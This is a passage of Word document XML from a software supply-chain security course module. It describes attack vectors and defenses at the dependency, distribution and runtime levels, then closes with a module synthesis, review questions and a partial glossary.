      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Defenses at the build level: SLSA (Module 2 of this curriculum), ephemeral build environments, hermetic builds, reproducible builds, build provenance attestation, build-step isolation. The build level is where the most active innovation in supply chain security is happening in 2024–2026, and SLSA is the dominant framework for that innovation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.4 Level 3 — Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The dependencies level </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is where external code — libraries, frameworks, tools — is pulled into a project. Attacks at this level aim to compromise upstream dependencies that downstream projects consume, including transitively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specific attack vectors at the dependencies level:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious packages published to registries. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">event-stream and many other incidents. An attacker gains publish rights to a package and pushes a malicious version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dependency confusion. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker publishes a package to a public registry with the same name as a private internal package; misconfigured builds fetch the wrong one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable transitive dependencies. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Log4Shell is the canonical example. An honest bug in a transitive dependency becomes an organization-wide vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Abandoned packages. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A package whose maintainer has stopped responding becomes a candidate for takeover by malicious actors, who then push compromised versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Integrity-verification bypass. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A dependency is fetched over an untrusted channel, or the integrity hash is not verified. A MITM attacker substitutes malicious content at the network level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Defenses at the dependencies level: SBOM (Module 3), dependency pinning with integrity hashes, lockfile discipline, vulnerability scanning (Module 4), dependency-surveillance tooling (Dependabot, Renovate, Socket, Snyk), package signing (when available), private registry mirrors with filtering. This is the layer where the most day-to-day supply-chain defensive work happens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.5 Level 4 — Distribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The distribution level </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is where built artifacts are delivered to consumers. Attacks at this level aim to intercept or tamper with the delivery mechanism — the consumer asks for artifact X, but what they receive is artifact X-prime, a malicious variant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specific attack vectors at the distribution level:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Registry compromise. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker gains administrative access to a package registry and serves malicious versions of legitimate packages. This has happened multiple times in various registries over the years.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITM on unencrypted downloads. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Some tools still fetch dependencies over HTTP or without integrity verification. An attacker on the network path can substitute malicious content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious mirrors. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Package registries often have mirror networks for performance. A compromised mirror serves altered packages to consumers routed through it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DNS or CDN compromise. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An attacker redirects registry traffic to attacker-controlled infrastructure via DNS hijacking or CDN manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Update-channel hijacking. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SolarWinds again — a legitimate software product's update mechanism is used to deliver compromised updates to existing consumers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Defenses at the distribution level: signing (Module 4), Sigstore for keyless signing, transparency logs for signature verification (Rekor), in-toto attestations, Update Framework (TUF) for secure update mechanisms, HTTPS-only for all package fetching, integrity-hash verification of downloads, code-signing certificates, mirror curation. The distribution layer has been well-understood longer than some of the others — cryptographic signing of packages has been practiced for decades — but the tooling has matured significantly with Sigstore and related efforts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.6 Level 5 — Runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The runtime level </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is where artifacts actually execute in production. Attacks at this level aim to exploit known-vulnerable software that is currently running — either vulnerabilities in the software itself or in its configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specific attack vectors at the runtime level:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Running known-vulnerable software. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Log4Shell is the canonical example. The fix existed; organizations that had not yet deployed it were exposed. Any CVE-with-exploit-available targeting deployed production software is this category.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploited configurations. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Even patched software with unsafe configuration is vulnerable. Overly-permissive IAM, default credentials, exposed admin endpoints — all permit exploitation of otherwise-patched software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-day exploitation. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vulnerabilities that are exploited before patches are available. These are rare for any specific software but common in aggregate across a large software footprint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Supply chain payloads activating at runtime. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The malicious code introduced via a supply chain compromise actually executes. The compromise happened earlier (at source, build, dependency, or distribution level), but the damage manifests at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Defenses at the runtime level: vulnerability management programs (scanning, patching, tracking), admission controllers (policy-driven rejection of artifacts that fail supply chain requirements), runtime monitoring (eBPF, seccomp, similar), network segmentation, least-privilege service accounts, defense-in-depth from the Secrets Management curriculum. This level intersects with many other security disciplines — application security, infrastructure security, DevSecOps — that predate 'supply chain security' as a named discipline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">8.7 How the Levels Relate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The five levels are not independent; a single attack may span multiple levels. SolarWinds was primarily a build-level attack, but its effects were felt at distribution (the update mechanism) and runtime (the backdoor executed). Log4Shell was primarily a runtime exploitation of a dependency, but its responses spanned dependency inventory (SBOM) and distribution (verifying legitimate package versions). xz-utils operated at source level (social engineering of maintainer trust) and build level (tarball vs. source-tree difference), with runtime effects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is why the defensive frameworks covered in later modules often address multiple levels simultaneously. SLSA is primarily a build-level framework but produces provenance metadata that is consumed at distribution and runtime. SBOM is primarily a dependency-level artifact but is generated at build time and consumed at runtime. Signing operates primarily at distribution but requires integration with build systems and is verified at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The layered nature of the defenses matches the layered nature of the attacks. Each level has specific controls, and a compromise at any level that makes it through the subsequent levels' defenses reaches runtime. Robust supply-chain security requires defense at every level, not just the one where attacks have historically concentrated.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8</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The five-level threat model (source, build, dependencies, distribution, runtime) organizes supply chain attacks by where in the pipeline the compromise occurs. Each level has distinct attack vectors and distinct defensive controls. Source-level defenses are code review and branch protection; build-level defenses are SLSA, hermetic builds, and provenance; dependency-level defenses are SBOM and vulnerability scanning; distribution-level defenses are signing and transparency; runtime-level defenses are patching and admission control. A successful attack often spans multiple levels; defense therefore requires coverage at every level, not concentration on any one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Synthesis: How the Module Fits Together and What Comes Next</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This module has laid the foundation for the rest of the curriculum. It has answered three questions: what is a supply chain attack, what has the empirical record of such attacks looked like, and how should we organize our thinking about them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 1 defined the category and explained why it is structurally different from traditional application security. Supply chain attacks exploit the trust relationships inherent in software assembly; they scale through the cascade of dependencies that makes modern software possible; they defeat perimeter-based security models because they arrive through legitimate channels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapters 2 through 6 walked through five landmark incidents, each illustrating a distinct attack pattern. SolarWinds: build-server compromise, signed-but-backdoored binaries, the inflection point for the entire discipline. Codecov: auxiliary tooling as a credential-exfiltration vector, demonstrating that low-importance tools with high access make attractive targets. Log4Shell: the inventory problem — knowing where a vulnerable dependency is deployed is harder than fixing the vulnerability itself. event-stream: social attack vectors and staggered malicious commits, exploiting the volunteer-maintainer model of open source. xz-utils: multi-year social engineering combined with technical sophistication, a near-miss that would have backdoored essentially every Linux server in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 7 stepped back to explain why this is happening. Supply chain attacks have dominant attacker economics; direct attacks have become less attractive by comparison. Defenders cannot scale the traditional audit-everything model and must instead build architectural defenses that make compromises detectable and bounded rather than attempting to prevent them all. Regulation is catching up: executive orders, EU directives, and compliance frameworks are starting to require the specific tools (SBOM, attestation, signing) that address the threat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 8 introduced the five-level threat model (source, build, dependencies, distribution, runtime) that organizes the rest of the curriculum. Each level has distinct attack vectors and distinct defensive tools. The remaining modules will address each in depth:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 2 covers SLSA — Supply-chain Levels for Software Artifacts — primarily focused on build-level defenses and the integration with distribution-level provenance attestation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 3 covers SBOM — Software Bills of Materials — the dependency-level inventory that makes Log4Shell-style incidents tractable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 4 covers signing and verification — Sigstore, Cosign, transparency logs — the distribution-level guarantees that artifacts have not been tampered with en route.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 5 covers dependency management best practices — pinning, lockfiles, vulnerability scanning, dependency review tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module 6 covers runtime controls — admission controllers, policy enforcement at cluster level, the tools that prevent known-bad artifacts from running.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The goal of the entire curriculum is to equip you to evaluate, implement, and operate the supply chain security controls that a modern software organization needs. The foundation has been laid in this module; the specific tools and practices follow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Review Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Define a supply chain attack. Explain why it is structurally different from a direct attack against a specific target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Walk through the technical mechanics of the SolarWinds attack. What specifically was compromised, and why did signed artifacts fail to protect consumers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explain how the Codecov incident used a change of fewer than 10 lines to compromise thousands of organizations. What does this teach us about auxiliary tooling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What was the specific operational problem that Log4Shell exposed, beyond the vulnerability itself? What defensive tool most directly addresses it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Describe the event-stream incident's sequence of events, paying attention to the staggered nature of the attack. Why did splitting the attack across two packages make detection harder?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">xz-utils involved approximately three years of social engineering. What specific structural property of open-source maintenance did the attackers exploit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explain the economic asymmetry between supply chain attacks and direct attacks. Why have sophisticated adversaries shifted their effort in this direction?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Name the five levels of the supply chain threat model and give one example attack vector and one example defense for each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A team is building a defense strategy and can invest in exactly one of: (a) SBOM generation, (b) build-system hardening, (c) dependency scanning, (d) package signing. Based on their specific context, which would you recommend and why? Discuss for a context of your choosing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explain why 'signing proves origin, not intent.' Give an example where a legitimately-signed artifact was still a compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Describe how a single supply chain incident might span multiple levels of the threat model. Use SolarWinds as an example.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Discuss the claim that 'the open-source maintenance model is a structural vulnerability.' What specifically makes it so, and what structural remedies have been proposed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Glossary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Abandoned-package takeover: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an attack where an attacker gains publish rights to an unmaintained package and pushes malicious versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Build provenance: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">metadata describing how and where an artifact was built, used for verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Common Vulnerabilities and Exposures; a standardized identifier for publicly-disclosed security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dependency confusion: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an attack where an attacker publishes a public package with the same name as a private internal package, tricking build systems into fetching the wrong one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Distribution channel: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the mechanism by which a built artifact reaches its consumers — package registry, update server, container registry, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hermetic build: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a build that has no external dependencies at build time beyond explicitly-declared inputs; reproducible across environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JNDI: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Java Naming and Directory Interface; the API exploited by the Log4Shell vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Log4Shell: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CVE-2021-44228, a remote code execution vulnerability in Apache Log4j disclosed in December 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
